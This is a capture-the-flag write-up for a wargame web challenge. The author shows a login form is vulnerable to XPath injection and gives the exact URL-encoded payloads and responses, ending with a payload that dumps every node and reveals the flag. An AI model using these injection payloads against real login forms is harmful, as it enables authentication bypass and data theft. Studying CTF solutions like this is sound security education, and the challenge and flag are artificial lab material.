First of all, it was a bit tricky challenge.

admin has given the hint in the IRC channel itself that the title is the hint.
First we found out that we can SQL Inject to the pass or user part.
--------------------------
REQUEST: http://challenges.wargame.vn/100-path-to-pro_548f20feaa3736e0c7320fc5e5b14a8c/?name=guest&pass=1%22+or+1+and+%221
RESULT:
nothing, flag is not here ;)
Maybe if you login as 'admin' you will find my secret
-------------------------

However, I found something weird; only substring() function worked and nothing else were working.
After searching them for hours, I later found out that this login is running out with xPath stuff.

--------------------------
REQUEST: http://challenges.wargame.vn/100-path-to-pro_548f20feaa3736e0c7320fc5e5b14a8c/?name=guest&pass=-1%22+or+count(//user/child::node())=5+and+%221
RESULT:
nothing, flag is not here ;)
Maybe if you login as 'admin' you will find my secret
--------------------------

after using some xpath injections we successfully got the flag with a decent listing
-------------------------
REQUEST:http://challenges.wargame.vn/100-path-to-pro_548f20feaa3736e0c7320fc5e5b14a8c/?name=guest&pass=1%22]%20|%20//*%20|//*[%221%22=%221
REQUEST:



nothing, flag is not here ;)



Maybe if you login as 'admin' you will find my secret



0x3004{XXXpath}
------------------------


flag:  0x3004{XXXpath}